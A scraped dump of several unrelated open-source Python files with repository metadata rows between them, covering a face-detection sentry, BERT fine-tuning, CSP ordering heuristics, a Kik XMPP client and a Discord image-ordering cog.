# Script entry point: forward the CLI arguments (db path, species) to main().
if __name__ == "__main__":
    main(sys.argv[1:])
| 31.741935 | 121 | 0.552337 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 690 | 0.35061 |
445f77fe93f324f67e10e55b0a43977d0e9569e3 | 292 | py | Python | spider/conf.py | schoeu/spid | eebb21fd41799cb077938593b4ff352b51322bc4 | [
"MIT"
] | 1 | 2018-10-18T06:59:34.000Z | 2018-10-18T06:59:34.000Z | spider/conf.py | schoeu/spid | eebb21fd41799cb077938593b4ff352b51322bc4 | [
"MIT"
] | 8 | 2021-03-18T21:11:03.000Z | 2022-03-11T23:30:58.000Z | spider/conf.py | schoeu/spid | eebb21fd41799cb077938593b4ff352b51322bc4 | [
"MIT"
] | null | null | null | import utils
import os
import json
def getjsondata(path):
    """Load a JSON file and return the parsed object.

    Relative paths are resolved against this module's directory rather than
    the current working directory.
    """
    if not os.path.isabs(path):
        path = os.path.join(os.path.dirname(os.path.realpath(__file__)), path)
    # BUG FIX: use a context manager so the file handle is always closed
    # (the original opened the file and never closed it).
    with open(path) as f:
        return json.load(f)
def getconfig():
    """Return the parsed contents of the module-local conf.json."""
    return getjsondata('./conf.json')
4460778f6a8c643ae09c2cfcff03efe7a38ed115 | 2,080 | py | Python | rocketbear/orderings.py | wallarelvo/rocketbear | 905c24e4243f178a50907ae965de68dc119de25d | [
"Apache-2.0"
] | 1 | 2015-04-13T09:59:21.000Z | 2015-04-13T09:59:21.000Z | rocketbear/orderings.py | wallarelvo/rocketbear | 905c24e4243f178a50907ae965de68dc119de25d | [
"Apache-2.0"
] | null | null | null | rocketbear/orderings.py | wallarelvo/rocketbear | 905c24e4243f178a50907ae965de68dc119de25d | [
"Apache-2.0"
] | null | null | null |
import graph
"""
This file contains multiple heuristics that can be used for static and
dynamic variable orderings
"""
class DynamicDomOverDeg(graph.ConstraintGraph):
    """
    Dynamic ordering: rank a variable by its current (pruned) domain size
    divided by its degree in the constraint graph.
    """
    def ordering(self, v):
        """
        Return the dom/deg score used to rank node ``v`` (smaller first).
        """
        domain_size = len(v.get_pruned_domain())
        degree = len(self.edges[v])
        return domain_size / degree
class DynamicSmallestDomainFirst(graph.ConstraintGraph):
    """
    Dynamic ordering that expands the variable with the currently smallest
    pruned domain first.
    """
    def ordering(self, v):
        """
        Return the size of ``v``'s pruned domain (smaller sorts first).
        """
        return len(v.get_pruned_domain())
class StaticSmallestDomainFirst(graph.ConstraintGraph):
    """
    Static ordering that expands the variable with the overall smallest
    (full, unpruned) domain first.
    """
    def ordering(self, v):
        """
        Return the size of ``v``'s full domain (smaller sorts first).
        """
        return len(v.get_full_domain())
class StaticMostArcsFirst(graph.ConstraintGraph):
    """
    Static ordering that expands the variable with the largest number of
    constraints (graph edges) first.
    """
    def ordering(self, v):
        """
        Return the negated arc count so higher-degree nodes sort first.
        """
        return -len(self.edges[v])
class DynamicMostArcsFirst(graph.ConstraintGraph):
    """
    Dynamic ordering that expands first the variable with the most
    constraints to variables that are not yet assigned.
    """
    def ordering(self, v):
        """
        Return minus the number of still-unassigned neighbours of ``v``.
        """
        return -sum(1 for nbr in self.edges[v] if not nbr.is_assigned())
# Registry used for higher-order functionality: maps a short code to the
# ordering-heuristic class it selects.
orders = {
    "dsdf": DynamicSmallestDomainFirst,
    "ssdf": StaticSmallestDomainFirst,
    "smaf": StaticMostArcsFirst,
    "dmaf": DynamicMostArcsFirst,
    "ddod": DynamicDomOverDeg
}
| 24.186047 | 78 | 0.647596 | 1,714 | 0.824038 | 0 | 0 | 0 | 0 | 0 | 0 | 1,114 | 0.535577 |
4460cfce11c83223a372c1c7e7325d7b8a9b4bfa | 617 | py | Python | src/covid_health/transcoding/names/owid.py | ggbaro/covid-health-ita | 267801c3de021078a1ca5d3b93b47515315f0300 | [
"MIT"
] | 3 | 2020-03-25T22:20:07.000Z | 2020-03-29T10:01:24.000Z | src/covid_health/transcoding/names/owid.py | ggbaro/covid-health-ita | 267801c3de021078a1ca5d3b93b47515315f0300 | [
"MIT"
] | null | null | null | src/covid_health/transcoding/names/owid.py | ggbaro/covid-health-ita | 267801c3de021078a1ca5d3b93b47515315f0300 | [
"MIT"
] | null | null | null | col = {
"owid": {
"Notes": "notes",
"Entity": "entity",
"Date": "time",
"Source URL": "src",
"Source label": "src_lb",
"Cumulative total": "tot_n_tests",
"Daily change in cumulative total": "n_tests",
"Cumulative total per thousand": "tot_n_tests_pthab",
"Daily change in cumulative total per thousand": "n_tests_pthab",
"General source label": "source",
"General source URL": "source_url",
"Short description": "source_desc",
"Detailed description": "source_desc_detailed",
}
}
# Variable-value transcoding table for OWID data; no renames needed yet.
var = {
    "owid": {}
}
| 28.045455 | 73 | 0.559157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 417 | 0.675851 |
4460d19513e88f49fee31e54b8a44dfa4a3f968c | 2,221 | py | Python | models/sentry.py | m1ojk/nicedoor | d9d6a1b56ac8ba642b726aa8fe9db1f1f8a209c7 | [
"MIT"
] | null | null | null | models/sentry.py | m1ojk/nicedoor | d9d6a1b56ac8ba642b726aa8fe9db1f1f8a209c7 | [
"MIT"
] | null | null | null | models/sentry.py | m1ojk/nicedoor | d9d6a1b56ac8ba642b726aa8fe9db1f1f8a209c7 | [
"MIT"
] | null | null | null | import cv2
import time
import logging
class Sentry:
    """Face-detection sentry: feed frames to is_alert() and it reports when
    an alert should fire, rate-limiting repeats for an unchanged face count."""
    # Haar cascade used for face detection (alternatives left commented out).
    #__face_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_default.xml')
    __face_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_alt.xml')
    #__face_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_upperbody.xml')
    # Loaded but not currently used by any method below.
    __eye_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_eye.xml')
    # Seconds between repeated alerts while the face count stays the same.
    __ALERT_INTERVAL = 5
    def __init__(self):
        # Number of faces found in the most recent frame.
        self.face_count = 0
        # Most recent frame (optionally annotated with face rectangles).
        self.image = None#cv2.imread('notfound.jpg',0)
        # Human-readable reason for the last alert decision.
        self.alert_reason = None
        # perf_counter timestamp of the last alert.
        self.__alert_time = 0.0
        # Face count recorded at the last alert.
        self.__alert_face_count = 0
        self.__faces = None
    def is_alert(self, image, indicate=False):
        """Process one frame; return True when an alert should fire.

        indicate: when True, draw rectangles around detected faces onto
        self.image.
        """
        is_detected = self.__is_face_detected(image, indicate)
        should_alert = self.__should_alert()
        #logging.debug("Detected: %r alert: %r"%(is_detected, should_alert))
        return is_detected and should_alert
    def __is_face_detected(self, image, indicate):
        # Haar cascades operate on grayscale input.
        gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        faces = self.__face_cascade.detectMultiScale(gray, 1.2, 2)
        self.face_count = len(faces)
        self.image = image
        if self.face_count > 0:
            self.__faces = faces
            if indicate:
                # Annotate each detected face with a rectangle.
                for (x,y,w,h) in self.__faces:
                    self.image = cv2.rectangle(self.image,(x,y),(x+w,y+h),(200,10,10),2)
        return self.face_count > 0
    # Alert Requirements
    # - No alert - when no faces were detected currently and previously
    # - alert - first time face_count is different than previous
    # - - If face_count is same as before and not 0, then alert every 5 seconds
    def __should_alert(self):
        # Nothing seen now or at the previous decision: stay quiet.
        if self.face_count == 0 and self.__alert_face_count == 0: return False
        # Face count changed: alert immediately and remember the new count.
        if self.face_count != self.__alert_face_count :
            self.alert_reason = "Face count was %s but is now %s"%(self.__alert_face_count, self.face_count)
            self.__alert_face_count = self.face_count
            self.__alert_time = time.perf_counter()
            return True
        # Unchanged count: re-alert only once per __ALERT_INTERVAL seconds.
        duration = int(time.perf_counter() - self.__alert_time)
        if duration > self.__ALERT_INTERVAL:
            self.alert_reason = "Duration is greater than %s"%self.__ALERT_INTERVAL
            self.__alert_time = time.perf_counter()
        return duration > self.__ALERT_INTERVAL
| 35.822581 | 102 | 0.719496 | 2,179 | 0.98109 | 0 | 0 | 0 | 0 | 0 | 0 | 640 | 0.288158 |
44612610a1b1f0eb6980ce4691cd9e86d9bc0301 | 5,753 | py | Python | train.py | ajitrajasekharan/huggingface_finetune_wrapper | 772aee569fd8ed225f340a167fd7137dc49be895 | [
"MIT"
] | 1 | 2021-06-13T05:38:54.000Z | 2021-06-13T05:38:54.000Z | train.py | ajitrajasekharan/huggingface_finetune_wrapper | 772aee569fd8ed225f340a167fd7137dc49be895 | [
"MIT"
] | null | null | null | train.py | ajitrajasekharan/huggingface_finetune_wrapper | 772aee569fd8ed225f340a167fd7137dc49be895 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score
import torch
from transformers import TrainingArguments, Trainer
from transformers import BertTokenizer, BertForSequenceClassification
from transformers import EarlyStoppingCallback
import pdb
import argparse
import traceback
import sys
# Fallback values for the -model, -output and -seq_length CLI options.
DEFAULT_MODEL_PATH="./model"
DEFAULT_OUTPUT_DIR="./output"
DEFAULT_SEQUENCE_LENGTH=512
class Dataset(torch.utils.data.Dataset):
    """Minimal torch dataset over HuggingFace tokenizer output.

    encodings: dict of per-feature lists (e.g. input_ids, attention_mask);
    labels: optional list of integer class labels.
    """
    def __init__(self, encodings, labels=None):
        self.encodings = encodings
        self.labels = labels
    def __getitem__(self, idx):
        sample = {name: torch.tensor(values[idx]) for name, values in self.encodings.items()}
        if self.labels:
            sample["labels"] = torch.tensor(self.labels[idx])
        return sample
    def __len__(self):
        return len(self.encodings["input_ids"])
# Define Trainer parameters
def compute_metrics(p):
    """Binary-classification metrics for a HF Trainer EvalPrediction tuple
    (logits, labels): accuracy, precision, recall and F1."""
    logits, labels = p
    preds = np.argmax(logits, axis=1)
    accuracy = accuracy_score(y_true=labels, y_pred=preds)
    recall = recall_score(y_true=labels, y_pred=preds)
    precision = precision_score(y_true=labels, y_pred=preds)
    f1 = f1_score(y_true=labels, y_pred=preds)
    return {"accuracy": accuracy, "precision": precision, "recall": recall, "f1": f1}
def _split_tab_pairs(texts):
    """Split 'first\\tsecond' strings back into two parallel lists."""
    first, second = [], []
    for entry in texts:
        parts = entry.split('\t')
        assert(len(parts) == 2)
        first.append(parts[0])
        second.append(parts[1])
    return first, second
def _tokenize(tokenizer, texts, paired, seq_length):
    """Tokenize a list of texts; when paired, each entry is a tab-joined
    sentence pair that is split and fed as (text, text_pair)."""
    if paired:
        first, second = _split_tab_pairs(texts)
        return tokenizer(text=first, text_pair=second, padding=True, truncation=True, max_length=seq_length)
    return tokenizer(texts, padding=True, truncation=True, max_length=seq_length)
def fine_tune(params):
    """Fine-tune a BERT sequence classifier (2 labels) on tab-separated data.

    params: argparse.Namespace with input, model, output, paired, seq_length.
    Side effects: trains the model and saves it to params.output.

    IMPROVEMENT: the original duplicated the pair-splitting/tokenization
    logic for the train and validation splits; it now lives in _tokenize.
    """
    input_file = params.input
    model_name_or_path = params.model
    output_dir = params.output
    paired = params.paired
    seq_length = params.seq_length
    # Read data: 'text' column (or 'text1'/'text2' when paired) plus 'label'.
    data = pd.read_csv(input_file, sep='\t')
    # Define pretrained tokenizer and model with a binary classification head.
    tokenizer = BertTokenizer.from_pretrained(model_name_or_path)
    model = BertForSequenceClassification.from_pretrained(model_name_or_path, num_labels=2)
    device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
    model.to(device)
    # ----- 1. Preprocess data -----#
    if paired:
        X1 = list(data["text1"])
        X2 = list(data["text2"])
        assert(len(X1) == len(X2))
        # Join pairs with a tab so train_test_split shuffles them as units.
        X = [a + '\t' + b for a, b in zip(X1, X2)]
    else:
        X = list(data["text"])
    y = list(data["label"])
    X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.01)
    X_train_tokenized = _tokenize(tokenizer, X_train, paired, seq_length)
    X_val_tokenized = _tokenize(tokenizer, X_val, paired, seq_length)
    # Create torch datasets
    train_dataset = Dataset(X_train_tokenized, y_train)
    val_dataset = Dataset(X_val_tokenized, y_val)
    # ----- 2. Fine-tune pretrained model -----#
    # Define Trainer
    args = TrainingArguments(
        output_dir=output_dir,
        evaluation_strategy="steps",
        eval_steps=100,
        save_steps=100,
        warmup_steps=500,
        per_device_train_batch_size=32,
        per_device_eval_batch_size=32,
        #learning_rate = 1e-5,
        num_train_epochs=5,
        #weight_decay=0.01,
        seed=0,
        load_best_model_at_end=True,
        logging_dir='./logs', # directory for storing logs
        logging_steps=10,
        metric_for_best_model="accuracy"
    )
    trainer = Trainer(
        model=model,
        args=args,
        train_dataset=train_dataset,
        eval_dataset=val_dataset,
        compute_metrics=compute_metrics,
        #callbacks=[EarlyStoppingCallback(early_stopping_patience=3)],
    )
    # Train pre-trained model
    trainer.train()
    trainer.save_model(output_dir)
    print("Model saved. Training complete")
# Command-line entry point: parse CLI options and launch fine-tuning.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Fine tune model ',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('-model', action="store", dest="model", default=DEFAULT_MODEL_PATH,help='BERT pretrained models, or custom model path')
    parser.add_argument('-input', action="store", dest="input",required=True, help='Input train data file')
    parser.add_argument('-output', action="store", dest="output",default=DEFAULT_OUTPUT_DIR, help='Output directory where model is saved')
    parser.add_argument('-seq_length', action="store", dest="seq_length",type=int,default=DEFAULT_SEQUENCE_LENGTH, help='Default max sequence length of input')
    parser.add_argument('-paired', dest="paired", action='store_true',help='Input is expected to be **pairs** of sentences')
    parser.add_argument('-no-paired', dest="paired", action='store_false',help='Input is expected to be **single** sentence - not pairs of sentences')
    parser.set_defaults(paired=False)
    results = parser.parse_args()
    try:
        torch.cuda.empty_cache()
        fine_tune(results)
    # BUG FIX: the original bare 'except:' also swallowed SystemExit and
    # KeyboardInterrupt; catch only real errors and still print the traceback.
    except Exception:
        print("Unexpected error:", sys.exc_info()[0])
        traceback.print_exc(file=sys.stdout)
| 34.656627 | 159 | 0.664523 | 445 | 0.077351 | 0 | 0 | 0 | 0 | 0 | 0 | 1,124 | 0.195376 |
44619703bad870796ed0246c1284937d5fd67724 | 681 | py | Python | examples/caseless_example.py | kajuberdut/incase | 48b281ac49e22d0b76510771bfa9de9ed94d1fc4 | [
"MIT"
] | null | null | null | examples/caseless_example.py | kajuberdut/incase | 48b281ac49e22d0b76510771bfa9de9ed94d1fc4 | [
"MIT"
] | null | null | null | examples/caseless_example.py | kajuberdut/incase | 48b281ac49e22d0b76510771bfa9de9ed94d1fc4 | [
"MIT"
] | null | null | null | from incase import Case, Caseless
# Instances of Caseless are genuine str subclass instances
example = Caseless("example string")
print(isinstance(example, str))
# True
# Any case rendering is available by attribute (property) ...
print(example.snake)
# example_string
# ... or by subscript, using a case-name string or a Case enum member
print(example["camel"])
# exampleString
print(example[Case.UPPER_SNAKE])
# EXAMPLE_STRING
# Caseless ignores case (and word separators) when comparing to str
print(Caseless("some name") == "SOME_NAME")
# True
# Caseless hashes also ignore case, so either spelling finds the dict key
a_dict = {Caseless("This is a Key"): "this"}
print(a_dict[Caseless("thisIsAKey")])
# Caseless.factory builds a reusable case-coercion function
make_camel = Caseless.factory("camel")
print(make_camel("snake_case"))
# snakeCase
| 21.28125 | 52 | 0.754772 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 379 | 0.556535 |
4461eff877eb304b062070484689204017151234 | 150 | py | Python | A/A 1030 In Search of an Easy Problem.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | null | null | null | A/A 1030 In Search of an Easy Problem.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | 1 | 2021-05-05T17:05:03.000Z | 2021-05-05T17:05:03.000Z | A/A 1030 In Search of an Easy Problem.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | null | null | null | # https://codeforces.com/problemset/problem/1030/A
n = int(input())
votes = list(map(int, input().split()))
# The problem is HARD exactly when at least one juror answered 1.
print('HARD' if 1 in votes else 'EASY')
446236fdcdb79bd05ce93e13267607c7ab6079e6 | 752 | py | Python | leetcode/039-Combination-Sum/CombinationSum_001.py | cc13ny/all-in | bc0b01e44e121ea68724da16f25f7e24386c53de | [
"MIT"
] | 1 | 2017-05-18T06:11:02.000Z | 2017-05-18T06:11:02.000Z | leetcode/039-Combination-Sum/CombinationSum_001.py | cc13ny/all-in | bc0b01e44e121ea68724da16f25f7e24386c53de | [
"MIT"
] | 1 | 2016-02-09T06:00:07.000Z | 2016-02-09T07:20:13.000Z | leetcode/039-Combination-Sum/CombinationSum_001.py | cc13ny/all-in | bc0b01e44e121ea68724da16f25f7e24386c53de | [
"MIT"
] | 2 | 2019-06-27T09:07:26.000Z | 2019-07-01T04:40:13.000Z | class Solution:
# @param {integer[]} candidates
# @param {integer} target
# @return {integer[][]}
    def combinationSum(self, candidates, target):
        """Return all unique combinations of candidates (values reusable)
        that sum to target. Sorts candidates in place so the recursive
        helper can prune once a value exceeds the remaining target."""
        candidates.sort()
        return self.combsum(candidates, target)
def combsum(self, nums, target):
if target == 0:
return [[]]
if not nums or nums[0] > target or target < 1:
return []
res = []
for i in range(len(nums)):
num = nums[i]
pre = [num]
t = target
while t >= num:
t -= num
subs = self.combsum(nums[i + 1:], t)
for sub in subs:
res.append(pre + sub)
pre += [num]
return res
| 27.851852 | 54 | 0.458777 | 751 | 0.99867 | 0 | 0 | 0 | 0 | 0 | 0 | 79 | 0.105053 |
44631cbd82bde4053d51f4b0bd82dc77e1e5e801 | 1,290 | py | Python | diplomacy_research/models/gym/__init__.py | wwongkamjan/dipnet_press | 787263c1b9484698904f525c8d78d0e333e1c0d9 | [
"MIT"
] | 39 | 2019-09-06T13:42:24.000Z | 2022-03-18T18:38:43.000Z | diplomacy_research/models/gym/__init__.py | wwongkamjan/dipnet_press | 787263c1b9484698904f525c8d78d0e333e1c0d9 | [
"MIT"
] | 9 | 2019-09-19T22:35:32.000Z | 2022-02-24T18:04:57.000Z | diplomacy_research/models/gym/__init__.py | wwongkamjan/dipnet_press | 787263c1b9484698904f525c8d78d0e333e1c0d9 | [
"MIT"
] | 8 | 2019-10-16T21:09:14.000Z | 2022-02-23T05:20:37.000Z | # ==============================================================================
# Copyright 2019 - Philip Paquette
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" OpenAI Gym integration modules """
import warnings
from gym.envs.registration import register
from diplomacy_research.models.gym.wrappers import AutoDraw, LimitNumberYears, LoopDetection, SetInitialState, \
AssignPlayers, RandomizePlayers, SetPlayerSeed, SaveGame
# Ignore specific warnings
warnings.filterwarnings('ignore', message='Parameters to load are deprecated')
register(
id='DiplomacyEnv-v0',
entry_point='diplomacy_research.models.gym.environment:DiplomacyEnv')
| 49.615385 | 112 | 0.684496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 967 | 0.749612 |
44635bbeca29eba01a7b5eccef6188241ac9a808 | 4,271 | py | Python | kik_unofficial/datatypes/xmpp/history.py | TriSerpent/kik-bot-api-unofficial | 9ae9dea8a4936ba628c9ac7a749aa8d6b3e94487 | [
"MIT"
] | 120 | 2017-07-07T14:07:14.000Z | 2022-02-22T03:14:23.000Z | kik_unofficial/datatypes/xmpp/history.py | TheGreatCodeholio/kik-bot-api-unofficial | c1f02b735dcb3e1d1b5e29a1ca04dd2f66557248 | [
"MIT"
] | 173 | 2017-07-07T04:31:19.000Z | 2021-11-20T02:59:20.000Z | kik_unofficial/datatypes/xmpp/history.py | TheGreatCodeholio/kik-bot-api-unofficial | c1f02b735dcb3e1d1b5e29a1ca04dd2f66557248 | [
"MIT"
] | 101 | 2017-07-11T19:43:17.000Z | 2022-03-03T02:04:05.000Z | from bs4 import BeautifulSoup
import time
from kik_unofficial.datatypes.xmpp.base_elements import XMPPElement, XMPPResponse
class Struct:
    """Ad-hoc record type: every keyword argument becomes an attribute."""
    def __init__(self, **entries):
        for name, value in entries.items():
            setattr(self, name, value)
class OutgoingAcknowledgement(XMPPElement):
    """
    Represents an outgoing acknowledgement for a message ID.

    group_jid selects the stanza shape: when set, the ack carries the
    group attribute (g="..."); when None, a plain 1-on-1 ack is sent.
    """
    def __init__(self, sender_jid, is_receipt, ack_id, group_jid):
        super().__init__()
        self.sender_jid = sender_jid
        self.group_jid = group_jid
        self.is_receipt = is_receipt
        self.ack_id = ack_id
    def serialize(self):
        """Build the QoS ack <iq> stanza and return it as UTF-8 bytes."""
        # Current wall-clock time in milliseconds.
        timestamp = str(int(round(time.time() * 1000)))
        user_ack_data = (
            '<sender jid="{}">'
            '<ack-id receipt="{}">{}</ack-id>'
            '</sender>'
        ).format(self.sender_jid, str(self.is_receipt).lower(), self.ack_id)
        group_ack_data = (
            '<sender jid="{}" g="{}">'
            '<ack-id receipt="{}">{}</ack-id>'
            '</sender>'
        ).format(self.sender_jid, self.group_jid, str(self.is_receipt).lower(), self.ack_id)
        # BUG FIX: the original condition was inverted — it picked
        # user_ack_data when group_jid WAS set and group_ack_data when it
        # was None, so group acks lost their g="..." attribute and 1-on-1
        # acks embedded a bogus g="None".
        ack_data = group_ack_data if self.group_jid is not None else user_ack_data
        data = ('<iq type="set" id="{}" cts="{}">'
                '<query xmlns="kik:iq:QoS">'
                '<msg-acks>'
                '{}'
                '</msg-acks>'
                '<history attach="false" />'
                '</query>'
                '</iq>'
                ).format(self.message_id, timestamp, ack_data)
        return data.encode()
class OutgoingHistoryRequest(XMPPElement):
    """
    Represents an outgoing request for the account's messaging history
    """
    def __init__(self):
        super().__init__()
    def serialize(self):
        """Build the QoS history-request <iq> stanza as UTF-8 bytes."""
        now_ms = str(int(round(time.time() * 1000)))
        stanza = ('<iq type="set" id="{}" cts="{}">'
                  '<query xmlns="kik:iq:QoS">'
                  '<msg-acks />'
                  '<history attach="true" />'
                  '</query>'
                  '</iq>').format(self.message_id, now_ms)
        return stanza.encode()
class HistoryResponse(XMPPResponse):
    """
    Represents a Kik messaging history response.

    Attributes are always defined: ``more`` (whether additional history is
    available), ``from_jid`` (the responding JID, or None) and ``messages``
    (Struct records for each recognized history element).
    """
    def __init__(self, data: BeautifulSoup):
        super().__init__(data)
        self.id = data["id"]
        # ROBUSTNESS FIX: the original only defined these attributes when a
        # <history> element was present, so callers hit AttributeError on
        # empty responses. Define safe defaults up front.
        self.more = False
        self.from_jid = None
        self.messages = []
        if data.query.history:
            self.more = data.query.history.has_attr("more")
            self.from_jid = data["from"]
            for message in data.query.history:
                if message["type"] == "receipt":
                    self.messages.append(Struct(
                        type='receipt',
                        from_jid=message["from"],
                        receipt_type=message.receipt["type"],
                        id=message.receipt.msgid["id"]))
                elif message["type"] in ("chat", "groupchat"):
                    # chat and groupchat share every field except group_jid.
                    args = {
                        'type': message["type"],
                        'id': message["id"],
                        'from_jid': message["from"],
                        # body/preview elements are optional in the XML
                        'body': message.body.text if message.body else None,
                        'preview': message.preview.text if message.preview else None,
                        'timestamp': message.kik["timestamp"],
                    }
                    if message["type"] == "groupchat":
                        args['group_jid'] = message.g["jid"]
                    self.messages.append(Struct(**args))
| 39.546296 | 114 | 0.453055 | 4,126 | 0.96605 | 0 | 0 | 0 | 0 | 0 | 0 | 896 | 0.209787 |
44682de12346bdb7a5f9ddce92b3b5515a1d9846 | 826 | py | Python | tests/test_flavor.py | cloudscale-ch/cloudscale-python-sdk | 67f9509f698dbaba529f183ba50694770a0c64bd | [
"MIT"
] | 2 | 2020-07-18T16:43:32.000Z | 2020-11-14T12:51:38.000Z | tests/test_flavor.py | cloudscale-ch/cloudscale-python-sdk | 67f9509f698dbaba529f183ba50694770a0c64bd | [
"MIT"
] | 4 | 2020-08-20T08:38:06.000Z | 2020-12-09T22:12:05.000Z | tests/test_flavor.py | cloudscale-ch/cloudscale-python-sdk | 67f9509f698dbaba529f183ba50694770a0c64bd | [
"MIT"
] | null | null | null | import responses
from cloudscale import (
CLOUDSCALE_API_URL,
Cloudscale,
CloudscaleApiException,
CloudscaleException,
)
# Canned API payload for a single flavor, mirroring one element of the
# GET /flavors response used by the mocked tests below.
FLAVOR_RESP = {
    "slug": "flex-2",
    "name": "Flex-2",
    "vcpu_count": 1,
    "memory_gb": 2,
    "zones": [{"slug": "rma1"}, {"slug": "lpg1"}],
}
@responses.activate
def test_flavor_get_all():
    """flavor.get_all() returns the flavor list from the mocked endpoint."""
    # Register the same mocked responses as before: two successful payloads
    # followed by a 500 that must not be reached by a single get_all() call.
    for _ in range(2):
        responses.add(
            responses.GET, CLOUDSCALE_API_URL + "/flavors", json=[FLAVOR_RESP], status=200
        )
    responses.add(responses.GET, CLOUDSCALE_API_URL + "/flavors", json={}, status=500)
    client = Cloudscale(api_token="token")
    flavors = client.flavor.get_all()
    assert flavors[0]["slug"] == "flex-2"
    assert flavors[0]["name"] == "Flex-2"
| 25.8125 | 86 | 0.644068 | 0 | 0 | 0 | 0 | 531 | 0.642857 | 0 | 0 | 147 | 0.177966 |
4468581d70ebf3e6fb721882f185cef4082b1c84 | 7,213 | py | Python | cogs/order.py | SilentSerenityy/JDBot | cd404000f06d51757439e435b2aaedbbab233144 | [
"MIT"
] | null | null | null | cogs/order.py | SilentSerenityy/JDBot | cd404000f06d51757439e435b2aaedbbab233144 | [
"MIT"
] | null | null | null | cogs/order.py | SilentSerenityy/JDBot | cd404000f06d51757439e435b2aaedbbab233144 | [
"MIT"
] | null | null | null | import os, discord, time, async_cse, random, TenGiphPy
from discord.ext import commands
from difflib import SequenceMatcher
from discord.ext.commands.cooldowns import BucketType
# Module-level API clients; both tokens must be present in the environment
# at import time or loading this extension raises KeyError.
tenor_client = TenGiphPy.Tenor(token=os.environ["tenor_key"])
giphy_client = TenGiphPy.Giphy(token=os.environ["giphy_token"])
class Order(commands.Cog):
def __init__(self,client):
self.client = client
@commands.cooldown(1,30,BucketType.user)
@commands.group(name="order",invoke_without_command=True)
async def order(self,ctx,*,args=None):
if args is None:
await ctx.send("You can't order nothing.")
if args:
time_before=time.process_time()
image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
try:
results = await image_client.search(args, safesearch=True, image_search=True)
emoji_image = sorted(results, key=lambda x: SequenceMatcher(None, x.image_url,args).ratio())[-1]
except async_cse.search.NoResults:
await ctx.send("No results found :(")
await image_client.close()
return
await image_client.close()
time_after=time.process_time()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.client.get_channel(738912143679946783).send(embed=embed)
@commands.cooldown(1,30,BucketType.user)
@order.command(brief="a command to shuffle images from google images")
async def shuffle(self,ctx,*,args=None):
if args is None:
await self.order(ctx,args="shuffle")
if args:
time_before=time.process_time()
image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
try:
results = await image_client.search(args, safesearch=True, image_search=True)
except async_cse.search.NoResults:
await ctx.send("No results found :(")
await image_client.close()
return
emoji_image = random.choice(results)
await image_client.close()
time_after=time.process_time()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.client.get_channel(738912143679946783).send(embed=embed)
@commands.cooldown(1,30,BucketType.user)
@commands.command(brief="a command to shuffle images from google images",aliases=["order-shuffle"])
async def order_shuffle(self,ctx,*,args=None):
if args is None:
await ctx.send("You can't order nothing")
if args:
time_before=time.process_time()
image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
try:
results = await image_client.search(args, safesearch=True, image_search=True)
except async_cse.search.NoResults:
await ctx.send("No results found :(")
await image_client.close()
return
emoji_image = random.choice(results)
await image_client.close()
time_after=time.process_time()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.client.get_channel(738912143679946783).send(embed=embed)
